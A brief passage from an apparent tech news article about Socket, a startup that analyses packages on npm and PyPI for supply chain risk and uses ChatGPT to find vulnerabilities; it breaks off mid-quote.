It’s too hard for developers to do the right thing, according to https://www.linkedin.com/in/feross/, an avid open source maintainer and founder of Socket, a startup focused on the security of open source components. It’s found ChatGPT a good fit for ferreting out the types of vulnerabilities those components contain.

The Bay area startup Socket detects more than https://socket.dev/npm/issue of supply chain risk in open source code.

“We analyze every open source package that’s published to all the major registries, so npm for JavaScript, PyPy for Python.

And then when the developer goes to choose what open source code they want to rely on …

Related Articles